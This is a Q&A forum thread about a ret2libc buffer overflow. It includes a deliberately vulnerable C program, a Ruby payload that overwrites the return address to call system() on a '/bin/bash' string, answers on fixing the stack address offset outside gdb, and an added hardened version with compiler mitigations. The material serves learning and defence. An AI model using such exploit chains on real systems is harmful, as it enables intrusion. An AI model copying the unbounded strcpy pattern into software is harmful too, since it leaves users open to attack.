
I am learning about ret2libc buffer overflow exploits to bypass NX.

My vulnerable code (vuln.c):

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[])
{
    char buffer[512];

    if (argc != 2)
        printf("NO\n");
    else {
        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);
    }
}

Compiled with this command: # gcc -o vuln vuln.c

I then created this simple ret2libc exploit in ruby (exploit.rb):

p = "A"*524
p += [0xb7e9ef10].pack('V') # system()      (32-bit little-endian address)
p += [0xb7e79e46].pack('V') # normal ret val (return address after system())
p += [0xbffff75a].pack('V') # "/bin/bash"   (address of the string on the stack)
print(p)

If I run it in gdb with (gdb) r $(ruby exploit.rb), it gives me a nice bash shell.

I then try to run it in a normal shell with # ./vuln $(ruby exploit.rb), but instead of a shell it gives me this: sh: 1: g:0:1: not found

ASLR is disabled and the only protection enabled is NX, I think.

Any help is appreciated.

Edit:

I am running this on i686 in case that helps.

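The overflow exists because strcpy() copies argv[1] into a 512-byte stack buffer with no length check, and NX alone does not stop ret2libc because the payload never executes code on the stack; it only redirects the return address into libc. As an added example (not the question's code and not from either answer), here is vuln.c rebuilt around a bounded copy that rejects oversized input; the helper name copy_bounded and the BUF_SIZE macro are my own.

```c
/* Added example: the strcpy() pattern from vuln.c replaced by a bounded copy.
 * Names (copy_bounded, BUF_SIZE) are assumptions of this example. */
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 512

/* Copy src into buf only if it fits, terminator included.
 * Returns 0 on success (buf is NUL-terminated) or -1 if the input was
 * rejected (buf is left untouched). strnlen() never reads past bufsize
 * bytes of src, so an unterminated or huge input cannot overrun anything. */
static int copy_bounded(char *buf, size_t bufsize, const char *src)
{
    size_t n = strnlen(src, bufsize);
    if (n >= bufsize)
        return -1;          /* no room for the NUL terminator */
    memcpy(buf, src, n + 1);
    return 0;
}

int main(int argc, char *argv[])
{
    char buffer[BUF_SIZE];

    if (argc != 2) {
        printf("NO\n");
        return 1;
    }
    /* The original did strcpy(buffer, argv[1]) here; a 524+ byte argument
     * then overwrote the saved return address with the ret2libc chain. */
    if (copy_bounded(buffer, sizeof buffer, argv[1]) != 0) {
        fprintf(stderr, "input too long (max %zu bytes)\n", sizeof buffer - 1);
        return 1;
    }
    printf("%s\n", buffer);
    return 0;
}
```

The source-level fix is what matters, but the build in the question (plain gcc -o vuln vuln.c) also leaves every compiler mitigation off. Building with -fstack-protector-strong adds a canary that aborts before the corrupted return address is used, -D_FORTIFY_SOURCE=2 with -O2 turns the original strcpy() into a checked variant that aborts on overflow, and -fPIE -pie makes the hard-coded libc and stack addresses in exploit.rb useless once ASLR is re-enabled.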

2 Answers


The shift is caused by the execution environment.

user@feynman:~$ ./getenv PWN
PWN ("/home/user/pwn") is at 0xbfffff82
user@feynman:~$ /home/user/getenv PWN
PWN ("/home/user/pwn") is at 0xbfffff70

Here, the way getenv is launched is what changes the address of PWN.

Answered 2013-07-09T19:25:05.550

You achieved code execution, but the address of the SHELL env var is off. Try [address of shell in gdb] + 4, or in gdb, x/s 0xbffff75a+4.

Answered 2013-06-26T02:39:36.360